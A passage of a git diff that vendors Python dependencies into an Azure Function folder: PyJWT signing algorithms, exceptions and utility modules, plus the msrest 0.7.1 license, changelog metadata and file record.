requires the ecdsa package to be installed. + + This is based off of the implementation in PyJWT 0.3.2 + """ + SHA256 = hashlib.sha256 + SHA384 = hashlib.sha384 + SHA512 = hashlib.sha512 + + def __init__(self, hash_alg): + self.hash_alg = hash_alg + + def prepare_key(self, key): + + if isinstance(key, ecdsa.SigningKey) or \ + isinstance(key, ecdsa.VerifyingKey): + return key + + if isinstance(key, string_types): + if isinstance(key, text_type): + key = key.encode('utf-8') + + # Attempt to load key. We don't know if it's + # a Signing Key or a Verifying Key, so we try + # the Verifying Key first. + try: + key = ecdsa.VerifyingKey.from_pem(key) + except ecdsa.der.UnexpectedDER: + key = ecdsa.SigningKey.from_pem(key) + + else: + raise TypeError('Expecting a PEM-formatted key.') + + return key + + def sign(self, msg, key): + return key.sign(msg, hashfunc=self.hash_alg, + sigencode=ecdsa.util.sigencode_string) + + def verify(self, msg, key, sig): + try: + return key.verify(sig, msg, hashfunc=self.hash_alg, + sigdecode=ecdsa.util.sigdecode_string) + except AssertionError: + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/pycrypto.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/pycrypto.py new file mode 100644 index 0000000..7c8d46c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/contrib/algorithms/pycrypto.py @@ -0,0 +1,46 @@ +import Crypto.Hash.SHA256 +import Crypto.Hash.SHA384 +import Crypto.Hash.SHA512 +from Crypto.PublicKey import RSA +from Crypto.Signature import PKCS1_v1_5 + +from jwt.algorithms import Algorithm +from jwt.compat import string_types, text_type + + +class RSAAlgorithm(Algorithm): + """ + Performs signing and verification operations using + RSASSA-PKCS-v1_5 and the specified hash function. + + This class requires PyCrypto package to be installed. + + This is based off of the implementation in PyJWT 0.3.2 + """ + SHA256 = Crypto.Hash.SHA256 + SHA384 = Crypto.Hash.SHA384 + SHA512 = Crypto.Hash.SHA512 + + def __init__(self, hash_alg): + self.hash_alg = hash_alg + + def prepare_key(self, key): + + if isinstance(key, RSA._RSAobj): + return key + + if isinstance(key, string_types): + if isinstance(key, text_type): + key = key.encode('utf-8') + + key = RSA.importKey(key) + else: + raise TypeError('Expecting a PEM- or RSA-formatted key.') + + return key + + def sign(self, msg, key): + return PKCS1_v1_5.new(key).sign(self.hash_alg.new(msg)) + + def verify(self, msg, key, sig): + return PKCS1_v1_5.new(key).verify(self.hash_alg.new(msg), sig) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/exceptions.py new file mode 100644 index 0000000..f40bffb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/exceptions.py @@ -0,0 +1,59 @@ +class PyJWTError(Exception): + """ + Base class for all exceptions + """ + pass + + +class InvalidTokenError(PyJWTError): + pass + + +class DecodeError(InvalidTokenError): + pass + + +class InvalidSignatureError(DecodeError): + pass + + +class ExpiredSignatureError(InvalidTokenError): + pass + + +class InvalidAudienceError(InvalidTokenError): + pass + + +class InvalidIssuerError(InvalidTokenError): + pass + + +class InvalidIssuedAtError(InvalidTokenError): + pass + + +class ImmatureSignatureError(InvalidTokenError): + pass + + +class InvalidKeyError(PyJWTError): + pass + + +class InvalidAlgorithmError(InvalidTokenError): + pass + + +class MissingRequiredClaimError(InvalidTokenError): + def __init__(self, claim): + self.claim = claim + + def __str__(self): + return 'Token is missing the "%s" claim' % self.claim + + +# Compatibility aliases (deprecated) +ExpiredSignature = ExpiredSignatureError +InvalidAudience = InvalidAudienceError +InvalidIssuer = InvalidIssuerError diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/help.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/help.py new file mode 100644 index 0000000..6db1953 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/help.py @@ -0,0 +1,61 @@ +from __future__ import print_function + +import json +import platform +import sys + +from . import __version__ as pyjwt_version + +try: + import cryptography +except ImportError: + cryptography = None + +try: + import ecdsa +except ImportError: + ecdsa = None + + +def info(): + """ + Generate information for a bug report. + Based on the requests package help utility module. + """ + try: + platform_info = {"system": platform.system(), "release": platform.release()} + except IOError: + platform_info = {"system": "Unknown", "release": "Unknown"} + + implementation = platform.python_implementation() + + if implementation == "CPython": + implementation_version = platform.python_version() + elif implementation == "PyPy": + implementation_version = "%s.%s.%s" % ( + sys.pypy_version_info.major, + sys.pypy_version_info.minor, + sys.pypy_version_info.micro, + ) + if sys.pypy_version_info.releaselevel != "final": + implementation_version = "".join( + [implementation_version, sys.pypy_version_info.releaselevel] + ) + else: + implementation_version = "Unknown" + + return { + "platform": platform_info, + "implementation": {"name": implementation, "version": implementation_version}, + "cryptography": {"version": getattr(cryptography, "__version__", "")}, + "pyjwt": {"version": pyjwt_version}, + } + + +def main(): + """Pretty-print the bug information as JSON.""" + print(json.dumps(info(), sort_keys=True, indent=2)) + + +if __name__ == "__main__": + main() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/utils.py new file mode 100644 index 0000000..b6f36f9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/jwt/utils.py @@ -0,0 +1,113 @@ +import base64 +import binascii +import struct + +from .compat import binary_type, bytes_from_int, text_type + +try: + from cryptography.hazmat.primitives.asymmetric.utils import ( + decode_dss_signature, encode_dss_signature + ) +except ImportError: + pass + + +def force_unicode(value): + if isinstance(value, binary_type): + return value.decode('utf-8') + elif isinstance(value, text_type): + return value + else: + raise TypeError('Expected a string value') + + +def force_bytes(value): + if isinstance(value, text_type): + return value.encode('utf-8') + elif isinstance(value, binary_type): + return value + else: + raise TypeError('Expected a string value') + + +def base64url_decode(input): + if isinstance(input, text_type): + input = input.encode('ascii') + + rem = len(input) % 4 + + if rem > 0: + input += b'=' * (4 - rem) + + return base64.urlsafe_b64decode(input) + + +def base64url_encode(input): + return base64.urlsafe_b64encode(input).replace(b'=', b'') + + +def to_base64url_uint(val): + if val < 0: + raise ValueError('Must be a positive integer') + + int_bytes = bytes_from_int(val) + + if len(int_bytes) == 0: + int_bytes = b'\x00' + + return base64url_encode(int_bytes) + + +def from_base64url_uint(val): + if isinstance(val, text_type): + val = val.encode('ascii') + + data = base64url_decode(val) + + buf = struct.unpack('%sB' % len(data), data) + return int(''.join(["%02x" % byte for byte in buf]), 16) + + +def merge_dict(original, updates): + if not updates: + return original + + try: + merged_options = original.copy() + merged_options.update(updates) + except (AttributeError, ValueError) as e: + raise TypeError('original and updates must be a dictionary: %s' % e) + + return merged_options + + +def number_to_bytes(num, num_bytes): + padded_hex = '%0*x' % (2 * num_bytes, num) + big_endian = binascii.a2b_hex(padded_hex.encode('ascii')) + return big_endian + + +def bytes_to_number(string): + return int(binascii.b2a_hex(string), 16) + + +def der_to_raw_signature(der_sig, curve): + num_bits = curve.key_size + num_bytes = (num_bits + 7) // 8 + + r, s = decode_dss_signature(der_sig) + + return number_to_bytes(r, num_bytes) + number_to_bytes(s, num_bytes) + + +def raw_to_der_signature(raw_sig, curve): + num_bits = curve.key_size + num_bytes = (num_bits + 7) // 8 + + if len(raw_sig) != 2 * num_bytes: + raise ValueError('Invalid signature') + + r = bytes_to_number(raw_sig[:num_bytes]) + s = bytes_to_number(raw_sig[num_bytes:]) + + return encode_dss_signature(r, s) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/LICENSE.md b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/LICENSE.md new file mode 100644 index 0000000..e0642d1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/LICENSE.md @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2016 Microsoft Azure + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/METADATA new file mode 100644 index 0000000..fcb3cf9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/METADATA @@ -0,0 +1,801 @@ +Metadata-Version: 2.1 +Name: msrest +Version: 0.7.1 +Summary: AutoRest swagger generator Python client runtime. +Home-page: https://github.com/Azure/msrest-for-python +Author: Microsoft Corporation +License: MIT License +Platform: UNKNOWN +Classifier: Development Status :: 4 - Beta +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: License :: OSI Approved :: MIT License +Classifier: Topic :: Software Development +Requires-Python: >=3.6 +Requires-Dist: azure-core (>=1.24.0) +Requires-Dist: certifi (>=2017.4.17) +Requires-Dist: isodate (>=0.6.0) +Requires-Dist: requests-oauthlib (>=0.5.0) +Requires-Dist: requests (~=2.16) +Provides-Extra: async +Requires-Dist: aiodns ; (python_version>='3.5') and extra == 'async' +Requires-Dist: aiohttp (>=3.0) ; (python_version>='3.5') and extra == 'async' + +AutoRest: Python Client Runtime +=============================== + +.. image:: https://travis-ci.org/Azure/msrest-for-python.svg?branch=master + :target: https://travis-ci.org/Azure/msrest-for-python + +.. image:: https://codecov.io/gh/azure/msrest-for-python/branch/master/graph/badge.svg + :target: https://codecov.io/gh/azure/msrest-for-python + +Installation +------------ + +To install: + +.. code-block:: bash + + $ pip install msrest + + +Release History +--------------- + +2022-06-10 Version 0.7.1 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Declare correctly msrest as Python 3.6 and more only for clarity #251 + + +2022-06-07 Version 0.7.0 ++++++++++++++++++++++++++ + +**Features** + +- Add `azure-core` as installation requirement #247 +- Replace `SerializationError` and `DeserializationError` in `msrest.exceptions` with those in `azure.core` #247 + +**Bugfixes** + +- Typing annotation in LROPoller (thanks to akx) #242 + +Thanks to kianmeng for typo fixes in the documentation. + +2021-01-26 Version 0.6.21 ++++++++++++++++++++++++++ + +**Bug Fixes** + +- Fixes `failsafe_deserialize` introduced in `0.6.20` #232 + +2021-01-25 Version 0.6.20 ++++++++++++++++++++++++++ + +**Features** + +- Add `failsafe_deserialize` method to the `Deserializer` object. #232 +- Serialize `datetime`, `date`, `time`, `timedelta` and `Decimal` correctly when serializing `object` . #224 + +2020-09-08 Version 0.6.19 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix serialization of random Model object #220 +- Fix serialization of unicode string in Py2 and object mode #221 + + +2020-07-27 Version 0.6.18 ++++++++++++++++++++++++++ + +**Features** + +- Add support for attributes/text in the same XML node #218 + + +2020-06-25 Version 0.6.17 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix XML and discriminator #214 + + +2020-06-09 Version 0.6.16 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix XML parsing with namespaces and attributes #209 + +**Features** + +- Add py.typed for mypy support + + +2020-06-04 Version 0.6.15 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix RFC regression introduced in 0.6.14 (RFC parse date are no longer pickable) #208 +- Fix XML parsing with namespaces #206 + +Thanks to ivanst0 for the contribution + + +2020-05-18 Version 0.6.14 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix "from_dict" in some complex flattening scenario #204 +- Fix RFC date parsing if machine locale is not English #201 + + +2020-04-07 Version 0.6.13 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix deserializer and flattening if intermediate node is None #198 +- Fix validation exception message for minimum/maximum checks #199 + + +2020-04-06 Version 0.6.12 ++++++++++++++++++++++++++ + +**Features** + +- Add "time" serializer/deserializer #196 + +2020-01-30 Version 0.6.11 ++++++++++++++++++++++++++ + +**Features** + +- XML mode can now be enabled even if the given Model has no XML metadata #184 +- Add Kerberos Authentication #186 +- Improve error message if expected type is dictionary and something else is provided #188 + +**Bugfixes** + +- Fix comma separated serialization of array in query #186 +- Fix validation of basic types in some complex scenario #189 + +Thanks to catatonicprime for the contribution + +2019-09-04 Version 0.6.10 ++++++++++++++++++++++++++ + +**Features** + +- XML mode now supports OpenAPI additional properties # 174 + +**Bugfixes** + +- Accept "is_xml" kwargs to force XML serialization #178 +- Disable XML deserialization if received element is not an ElementTree #178 +- A "null" enum deserialize as None, and not "None" anymore #173 +- Fix some UTF8 encoding issue in Python 2.7 and XML mode #172 + + +2019-07-24 Version 0.6.9 +++++++++++++++++++++++++ + +**Features** + +- Accept extensions of JSON mimetype as valid JSON #167 + +2019-06-24 Version 0.6.8 +++++++++++++++++++++++++ + +**BugFixes** + +- Impossible to serialize XML if model contains UTF8 characters on Python 2.7 #165 +- Impossible to deserialize a HTTP response as XML if body contains UTF8 characters on Python 2.7 #165 +- Loading a serialized configuration fails with NameError on NoOptionError #162 + +Thanks to cclauss for the contribution + +2019-06-12 Version 0.6.7 +++++++++++++++++++++++++ + +**Features** + +- Add DomainCredentials credentials for EventGrid + +Thanks to kalyanaj for the contribution + +2019-03-21 Version 0.6.6 +++++++++++++++++++++++++ + +**Bugfixes** + +- Make 0.6.x series compatible with pyinstaller again +- sdist now includes tests + +Thanks to dotlambda for the contribution + +2019-03-11 Version 0.6.5 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix list of integers serialization if div is provided #151 +- Fix parsing of UTF8 with BOM #145 + +Thanks to eduardomourar for the contribution + +2019-01-09 Version 0.6.4 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix regression on credentials configuration if used outside of Autorest scope #135 + +2019-01-08 Version 0.6.3 +++++++++++++++++++++++++ + +**Features** + +- Updated **experimental** async support. Requires Autorest.Python 4.0.64. + +2018-11-19 Version 0.6.2 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix circular dependency in TYPE_CHECKING mode #128 + +2018-10-15 Version 0.6.1 +++++++++++++++++++++++++ + +**Bugfixes** + +- Remove unnecessary verbose "warnings" log #126 + +2018-10-02 Version 0.6.0 +++++++++++++++++++++++++ + +**Features** + +- The environment variable AZURE_HTTP_USER_AGENT, if present, is now injected part of the UserAgent +- New **preview** msrest.universal_http module. Provide tools to generic HTTP management (sync/async, requests/aiohttp, etc.) +- New **preview** msrest.pipeline implementation: + + - A Pipeline is an ordered list of Policies than can process an HTTP request and response in a generic way. + - More details in the wiki page about Pipeline: https://github.com/Azure/msrest-for-python/wiki/msrest-0.6.0---Pipeline + +- Adding new attributes to Configuration instance: + + - http_logger_policy - Policy to handle HTTP logging + - user_agent_policy - Policy to handle UserAgent + - pipeline - The current pipeline used by the SDK client + - async_pipeline - The current async pipeline used by the async SDK client + +- Installing "msrest[async]" now installs the **experimental** async support. Works ONLY for Autorest.Python 4.0.63. + +**Breaking changes** + +- The HTTPDriver API introduced in 0.5.0 has been replaced by the Pipeline implementation. + +- The following classes have been moved from "msrest.pipeline" to "msrest.universal_http": + + - ClientRedirectPolicy + - ClientProxies + - ClientConnection + +- The following classes have been moved from "msrest.pipeline" to "msrest.universal_http.requests": + + - ClientRetryPolicy + +**Bugfixes** + +- Fix "long" on Python 2 if used with the "object" type #121 + +Thanks to robgolding for the contribution + +2018-09-04 Version 0.5.5 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix a serialization issue if additional_properties is declared, and "automatic model" syntax is used + ("automatic model" being the ability to pass a dict to command and have the model auto-created) # 120 + +2018-07-12 Version 0.5.4 +++++++++++++++++++++++++ + +**Features** + +- Support additionalProperties and XML + +**BugFixes** + +- Better parse empty node and not string types +- Improve "object" XML parsing + +2018-07-10 Version 0.5.3 +++++++++++++++++++++++++ + +**BugFixes** + +- Fix some XML serialization subtle scenarios + +2018-07-09 Version 0.5.2 +++++++++++++++++++++++++ + +**Features** + +- deserialize/from_dict now accepts a content-type parameter to parse XML strings + +**Bugfixes** + +- Fix some complex XML Swagger definitions. + +This release likely breaks already generated XML SDKs, that needs to be regenerated with autorest.python 3.0.58 + +2018-06-21 Version 0.5.1 +++++++++++++++++++++++++ + +**Bugfixes** + +- Lower Accept header overwrite logging message #110 +- Fix 'object' type and XML format + +Thanks to dharmab for the contribution + +2018-06-12 Version 0.5.0 +++++++++++++++++++++++++ + +**Disclaimer** + +This released is designed to be backward compatible with 0.4.x, but there is too many internal refactoring +and new features to continue with 0.4.x versioning + +**Features** + +- Add XML support +- Add many type hints, and MyPY testing on CI. +- HTTP calls are made through a HTTPDriver API. Only implementation is `requests` for now. This driver API is *not* considered stable + and you should pin your msrest version if you want to provide a personal implementation. + +**Bugfixes** + +- Incorrect milliseconds serialization for some datetime object #94 + +**Deprecation** + +That will trigger a DeprecationWarning if an old Autorest generated code is used. + +- _client.add_header is deprecated, and config.headers should be used instead +- _client.send_formdata is deprecated, and _client.put/get/delete/post + _client.send should be used instead + +2018-04-30 Version 0.4.29 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Improve `SDKClient.__exit__` to take exc_details as optional parameters and not required #93 +- refresh_session should also use the permanent HTTP session if available #91 + +2018-04-18 Version 0.4.28 ++++++++++++++++++++++++++ + +**Features** + +- msrest is now able to keep the "requests.Session" alive for performance. To activate this behavior: + + - Use the final Client as a context manager (requires generation with Autorest.Python 3.0.50 at least) + - Use `client.config.keep_alive = True` and `client.close()` (requires generation with Autorest.Python 3.0.50 at least) + - Use `client.config.keep_alive = True` and client._client.close() (not recommended, but available in old releases of SDK) + +- All Authentication classes now define `signed_session` and `refresh_session` with an optional `session` parameter. + To take benefits of the session improvement, a subclass of Authentication *MUST* add this optional parameter + and use it if it's not `None`: + + def signed_session(self, session=None): + session = session or requests.Session() + + # As usual from here. + +2018-03-07 Version 0.4.27 ++++++++++++++++++++++++++ + +**Features** + +- Disable HTTP log by default (security), add `enable_http_log` to restore it #86 + +**BugFixes** + +- Fix incorrect date parsing if ms precision is over 6 digits #82 + +2018-01-30 Version 0.4.26 ++++++++++++++++++++++++++ + +**Features** + +- Add TopicCredentials for EventGrid client + +**Bugfixes** + +- Fix minimal dependency of isodate +- Fix serialisation from dict if datetime provided + +2018-01-08 Version 0.4.25 ++++++++++++++++++++++++++ + +**Features** + +- Add LROPoller class. This is a customizable LRO engine. + This is the poller engine of Autorest.Python 3.0, and is not used by code generated by previous Autorest version. + +2018-01-03 Version 0.4.24 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Date parsing is now compliant with Autorest / Swagger 2.0 specification (less lenient) + +**Internal optimisation** + +- Call that does not return a streamable object are now executed in requests stream mode False (was True whatever the type of the call). + This should reduce the number of leaked opened session and allow urllib3 to manage connection pooling more efficiently. + Only clients generated with Autorest.Python >= 2.1.31 (not impacted otherwise, fully backward compatible) + +2017-12-21 Version 0.4.23 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Accept to deserialize enum of different type if content string match #75 +- Stop failing on deserialization if enum string is unkwon. Return the string instead. + +**Features** + +- Model now accept kwargs in constructor for future kwargs models + +2017-12-15 Version 0.4.22 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Do not validate additional_properties #73 +- Improve validation error if expected type is dict, but actual type is not #73 + +2017-12-14 Version 0.4.21 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix additional_properties if Swagger was flatten #72 + +2017-12-13 Version 0.4.20 ++++++++++++++++++++++++++ + +**Features** + +- Add support for additional_properties + + - By default, all additional_properties are kept. + - Additional properties are sent to the server only if it was specified in the Swagger, + or if "enable_additional_properties_sending" is called on the model we want it. + This is a class method that enables it for all instance of this model. + +2017-11-20 Version 0.4.19 ++++++++++++++++++++++++++ + +**Features** + +- The interpretation of Swagger 2.0 "discriminator" is now lenient. This means for these two scenarios: + + - Discriminator value is missing from the received payload + - Discriminator value is not defined in the Swagger + + Instead of failing with an exception, this now returns the base type for this "discriminator". + + Note that this is not a contradiction of the Swagger 2.0 spec, that specifies + "validation SHOULD fail [...] there may exist valid reasons in particular circumstances to ignore a particular item, + but the full implications must be understood and carefully weighed before choosing a different course." + + This cannot be configured for now and is the new default behvaior, but can be in the future if needed. + +**Bugfixes** + +- Optional formdata parameters were raising an exception (#65) +- "application/x-www-form-urlencoded" form was sent using "multipart/form-data". + This causes problems if the server does not support "multipart/form-data" (#66) + +2017-10-26 Version 0.4.18 ++++++++++++++++++++++++++ + +**Features** + +- Add ApiKeyCredentials class. This can be used to support OpenAPI ApiKey feature. +- Add CognitiveServicesAuthentication class. Pre-declared ApiKeyCredentials class for Cognitive Services. + +2017-10-12 Version 0.4.17 ++++++++++++++++++++++++++ + +**Features** + +This make Authentication classes more consistent: + +- OAuthTokenAuthentication is now a subclass of BasicTokenAuthentication (was Authentication) +- BasicTokenAuthentication has now a "set_token" methods that does nothing. + +This allows test like "isintance(o, BasicTokenAuthentication)" to be guaranteed that the following attributes exists: + +- token +- set_token() +- signed_session() + +This means for users of "msrestazure", that they are guaranteed that all AD classes somehow inherits from "BasicTokenAuthentication" + +2017-10-05 Version 0.4.16 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix regression: accept "set" as a valid "[str]" (#60) + +2017-09-28 Version 0.4.15 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Always log response body (#16) +- Improved exception message if error JSON is Odata v4 (#55) +- Refuse "str" as a valid "[str]" type (#41) +- Better exception handling if input from server is not JSON valid + +**Features** + +- Add Configuration.session_configuration_callback to customize the requests.Session if necessary (#52) +- Add a flag to Serializer to disable client-side-validation (#51) +- Remove "import requests" from "exceptions.py" for apps that require fast loading time (#23) + +Thank you to jayden-at-arista for the contribution + +2017-08-23 Version 0.4.14 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix regression introduced in msrest 0.4.12 - dict syntax with enum modeled as string and enum used + +2017-08-22 Version 0.4.13 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix regression introduced in msrest 0.4.12 - dict syntax using isodate.Duration (#42) + +2017-08-21 Version 0.4.12 ++++++++++++++++++++++++++ + +**Features** + +- Input is now more lenient +- Model have a "validate" method to check content constraints +- Model have now 4 new methods: + + - "serialize" that gives the RestAPI that will be sent + - "as_dict" that returns a dict version of the Model. Callbacks are available. + - "deserialize" the parses the RestAPI JSON into a Model + - "from_dict" that parses several dict syntax into a Model. Callbacks are available. + +More details and examples in the Wiki article on Github: +https://github.com/Azure/msrest-for-python/wiki/msrest-0.4.12---Serialization-change + +**Bugfixes** + +- Better Enum checking (#38) + +2017-06-21 Version 0.4.11 ++++++++++++++++++++++++++ + +**Bugfixes** + +- Fix incorrect dependency to "requests" 2.14.x, instead of 2.x meant in 0.4.8 + +2017-06-15 Version 0.4.10 ++++++++++++++++++++++++++ + +**Features** + +- Add requests hooks to configuration + +2017-06-08 Version 0.4.9 +++++++++++++++++++++++++ + +**Bugfixes** + +- Accept "null" value for paging array as an empty list and do not raise (#30) + +2017-05-22 Version 0.4.8 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix random "pool is closed" error (#29) +- Fix requests dependency to version 2.x, since version 3.x is annunced to be breaking. + +2017-04-04 Version 0.4.7 +++++++++++++++++++++++++ + +**BugFixes** + +- Refactor paging #22: + + - "next" is renamed "advance_page" and "next" returns only 1 element (Python 2 expected behavior) + - paging objects are now real generator and support the "next()" built-in function without need for "iter()" + +- Raise accurate DeserialisationError on incorrect RestAPI discriminator usage #27 +- Fix discriminator usage of the base class name #27 +- Remove default mutable arguments in Clients #20 +- Fix object comparison in some scenarios #24 + +2017-03-06 Version 0.4.6 +++++++++++++++++++++++++ + +**Bugfixes** + +- Allow Model sub-classes to be serialized if type is "object" + +2017-02-13 Version 0.4.5 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix polymorphic deserialization #11 +- Fix regexp validation if '\\w' is used in Python 2.7 #13 +- Fix dict deserialization if keys are unicode in Python 2.7 + +**Improvements** + +- Add polymorphic serialisation from dict objects +- Remove chardet and use HTTP charset declaration (fallback to utf8) + +2016-09-14 Version 0.4.4 +++++++++++++++++++++++++ + +**Bugfixes** + +- Remove paging URL validation, part of fix https://github.com/Azure/autorest/pull/1420 + +**Disclaimer** + +In order to get paging fixes for impacted clients, you need this package and Autorest > 0.17.0 Nightly 20160913 + +2016-09-01 Version 0.4.3 +++++++++++++++++++++++++ + +**Bugfixes** + +- Better exception message (https://github.com/Azure/autorest/pull/1300) + +2016-08-15 Version 0.4.2 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix serialization if "object" type contains None (https://github.com/Azure/autorest/issues/1353) + +2016-08-08 Version 0.4.1 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fix compatibility issues with requests 2.11.0 (https://github.com/Azure/autorest/issues/1337) +- Allow url of ClientRequest to have parameters (https://github.com/Azure/autorest/issues/1217) + +2016-05-25 Version 0.4.0 +++++++++++++++++++++++++ + +This version has no bug fixes, but implements new features of Autorest: +- Base64 url type +- unixtime type +- x-ms-enum modelAsString flag + +**Behaviour changes** + +- Add Platform information in UserAgent +- Needs Autorest > 0.17.0 Nightly 20160525 + +2016-04-26 Version 0.3.0 +++++++++++++++++++++++++ + +**Bugfixes** + +- Read only values are no longer in __init__ or sent to the server (https://github.com/Azure/autorest/pull/959) +- Useless kwarg removed + +**Behaviour changes** + +- Needs Autorest > 0.16.0 Nightly 20160426 + + +2016-03-25 Version 0.2.0 +++++++++++++++++++++++++ + +**Bugfixes** + +- Manage integer enum values (https://github.com/Azure/autorest/pull/879) +- Add missing application/json Accept HTTP header (https://github.com/Azure/azure-sdk-for-python/issues/553) + +**Behaviour changes** + +- Needs Autorest > 0.16.0 Nightly 20160324 + + +2016-03-21 Version 0.1.3 +++++++++++++++++++++++++ + +**Bugfixes** + +- Deserialisation of generic resource if null in JSON (https://github.com/Azure/azure-sdk-for-python/issues/544) + + +2016-03-14 Version 0.1.2 +++++++++++++++++++++++++ + +**Bugfixes** + +- urllib3 side effect (https://github.com/Azure/autorest/issues/824) + + +2016-03-04 Version 0.1.1 +++++++++++++++++++++++++ + +**Bugfixes** + +- Source package corrupted in Pypi (https://github.com/Azure/autorest/issues/799) + +2016-03-04 Version 0.1.0 ++++++++++++++++++++++++++ + +**Behavioural Changes** + +- Removed custom logging set up and configuration. All loggers are now children of the root logger 'msrest' with no pre-defined configurations. +- Replaced _required attribute in Model class with more extensive _validation dict. + +**Improvement** + +- Removed hierarchy scanning for attribute maps from base Model class - relies on generator to populate attribute + maps according to hierarchy. +- Base class Paged now inherits from collections.Iterable. +- Data validation during serialization using custom parameters (e.g. max, min etc). +- Added ValidationError to be raised if invalid data encountered during serialization. + +2016-02-29 Version 0.0.3 +++++++++++++++++++++++++ + +**Bugfixes** + +- Source package corrupted in Pypi (https://github.com/Azure/autorest/issues/718) + +2016-02-19 Version 0.0.2 +++++++++++++++++++++++++ + +**Bugfixes** + +- Fixed bug in exception logging before logger configured. + +2016-02-19 Version 0.0.1 +++++++++++++++++++++++++ + +- Initial release. + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/RECORD new file mode 100644 index 0000000..74065cb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest-0.7.1.dist-info/RECORD @@ -0,0 +1,57 @@ +msrest-0.7.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +msrest-0.7.1.dist-info/LICENSE.md,sha256=Pd-U_zBzEWih2bP3LENkE27b0XJqeLhPRBww827GhdM,1072 +msrest-0.7.1.dist-info/METADATA,sha256=yv3XS6yNXCzIkyZ3QLA2QTluybTBrlPqIGKY8OvfjoM,21655 +msrest-0.7.1.dist-info/RECORD,, +msrest-0.7.1.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +msrest-0.7.1.dist-info/top_level.txt,sha256=fTM0WfmxiY5eFZgIwGfhfCMBAq84y9Uw6zfp_Ctbr0s,7 